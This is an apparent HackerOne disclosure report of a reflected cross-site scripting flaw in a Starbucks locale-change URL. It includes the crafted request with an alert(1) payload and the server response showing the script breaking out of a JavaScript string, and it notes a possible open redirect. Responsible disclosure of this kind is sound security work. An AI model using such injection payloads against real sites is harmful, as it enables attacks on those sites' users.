Starbucks: Reflected XSS on (Locale-Change)

ID H1:190798
Type hackerone
Reporter inhibitor181
Modified 2017-06-09T00:00:19



Hello, the link at (was identified by changing languages) is prone to reflected XSS in the "en" zone of the LocaleID parameter. One can inject javascript that will be reflected back to the target while calling the modified link.


This injection is possible because the contents before the _CA are not validated and it will be injected in the response.

Request :

GET /on/;alert(1);//dasdsan_CA HTTP/1.1 Host:

Response :

<script type="text/javascript"> var uri = 'https:///on/';alert(1);//dasdsan_CA/Home-Show'; uri=decodeURIComponent(uri); if(uri.indexOf("/ca/en") >=0){ uri=uri.replace("/ca/en",""); } else if(uri.indexOf("/ca/fr") >=0){ uri=uri.replace("/ca/fr",""); } window.location = uri; </script>

Note the : var uri = 'https:///on/';alert(1);//dasdsan_CA/Home-Show';

This can also be modified to easily make an open redirect.

Also attached screenshot.